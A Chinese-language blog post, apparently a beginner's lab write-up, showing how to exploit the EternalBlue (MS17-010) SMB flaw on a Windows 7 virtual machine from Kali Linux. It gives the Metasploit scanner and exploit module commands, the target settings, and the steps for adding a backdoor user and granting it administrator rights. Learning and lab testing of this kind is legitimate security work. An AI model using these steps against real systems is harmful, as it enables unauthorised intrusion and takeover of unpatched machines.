永恒之蓝漏洞(开放445端口,关闭防火墙)

永恒之蓝漏洞(开放445端口,关闭防火墙)

2023年6月24日发(作者:)

永恒之蓝漏洞(开放445端⼝,关闭防⽕墙)⼩⽩学了⼀点简单的永恒之蓝,做了点笔记,感觉挺详细,希望能帮助到⼩伙伴们,⼤佬勿喷哦,有不⾜的地⽅希望多多指教实验⽬的本次实验主要是利⽤永恒之蓝漏洞对windows7进⾏控制利⽤,掌握Metaploit⼯具的使⽤,知道永恒之蓝的漏洞利⽤原理。实验原理永恒之蓝是在Windows的SMB服务处理SMB v1 请求时发⽣的漏洞,这个漏洞导致攻击者在⽬标系统上可以执⾏任意代码。通过永恒之蓝漏洞会扫描开放445⽂件共享端⼝的Windows机器,⽆需⽤户任何操作,只要开机上⽹,不法分⼦就能在电脑和服务器中植⼊勒索软件、远程控制⽊马、虚拟货币挖矿机等恶意程序。实验内容1、实验环境(这是我⾃⼰电脑上的实验环境)Kalilinux —攻击机 IP:192.168.153.131Win7系统 —靶机 IP: 192.168.153.133本实验永恒之蓝漏洞是基于445端⼝2、实验⼯具Metasploit是⼀个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本⾝附带数百个已知软件漏洞的专业级漏洞攻击⼯具。3、关闭防⽕墙和杀毒软件的前提下进⾏实验,靶机的445端⼝还要开启(这⾥我只是做了这⼀种情况,另外⼀种情况开启防⽕墙且关闭杀毒软件的前提下还没摸索出来,希望⼤佬可以提下意见)(1)kali linux:zenmap端⼝扫描如下图所⽰:可以发现445端⼝是开启的(2)再看系统的ip:(3)再看win7系统查看端⼝开放情况(4)使⽤渗透⼯具:metasploit framework使⽤scanner 扫描靶机是否存在永恒之蓝漏洞Search ms17_010如下图所⽰: Use auxiliary/scanner/smb/smb_ms17_010Show options --查看扫描结果Set rhost 192.168.153.133 —执⾏⽬标主机(5)进⼊渗透模块,设置靶机地址Search ms17_01Useexploit/windows/smb/ms17_010_eternalblue —进⼊渗透模块Set rhosts 192.168.153.133—设置渗透的⽬标主机Run —执⾏渗透的攻击Run —执⾏渗透的攻击此时,渗透成功了(6)在kali Linux 上查看win7 的端⼝开放情况和arp缓存表验证:创建⼀个qq⽤户 看是否成功提升创建的qq ⽤户权限为管理员Net localgroup administors qq重启win7 之后,会有刚才创建的⽤户qq:可见,kali虚拟机可以利⽤永恒之蓝漏洞对windows7进⾏控制利⽤了。以上是我做的⼀个⼩⼩实验,有很多不⾜的地⽅,希望⼤佬多多指点。

发布者:admin,转转请注明出处:http://www.yc00.com/web/1687579497a21792.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信